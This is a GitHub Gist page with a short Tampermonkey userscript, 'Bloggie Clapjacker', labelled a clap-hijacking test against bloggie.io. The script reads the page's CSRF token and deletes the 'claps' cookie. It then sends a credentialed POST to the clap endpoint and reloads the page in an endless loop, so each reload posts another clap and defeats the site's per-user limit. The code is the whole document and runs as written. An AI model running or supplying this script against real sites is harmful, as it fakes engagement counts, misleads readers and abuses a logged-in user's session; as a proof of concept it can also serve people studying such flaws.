Last active
September 26, 2019 04:43
-
-
Save Rayraegah/fb9906b5179578e5c0fcc4a55f26273a to your computer and use it in GitHub Desktop.
Clapjack test on Bloggie.io
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name Bloggie Clapjacker | |
| // @namespace http://tampermonkey.net/ | |
| // @version 0.3 | |
| // @description Find and hijack claps on bloggie.io posts | |
| // @author You | |
| // @match *://bloggie.io/@*/* | |
| // @grant none | |
| // ==/UserScript== | |
| (function() { | |
| // gets document location | |
| const location_blocks = location.href.split("/"); | |
| // creates clap endpoint | |
| const clap_ep = `https://bloggie.io/posts/${location_blocks[location_blocks.length - 1]}/claps`; | |
| // grabs the csrf token that's injected into page header | |
| const csrfToken = document | |
| .querySelector("meta[name='csrf-token']") | |
| .getAttribute("content"); | |
| // resets document cookie | |
| document.cookie = `claps=; expires=${+new Date()}; domain=${document.domain}; path=/`; | |
| // post a clap | |
| fetch(clap_ep, { | |
| headers: { | |
| "x-csrf-token": csrfToken | |
| }, | |
| method: "POST", | |
| credentials: "include" /* includes cookies */ | |
| }).then(function() { | |
| // reload page to trigger an infinite loop for this userscript | |
| // contineously posts claps | |
| location.reload(true); | |
| }); | |
| })(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment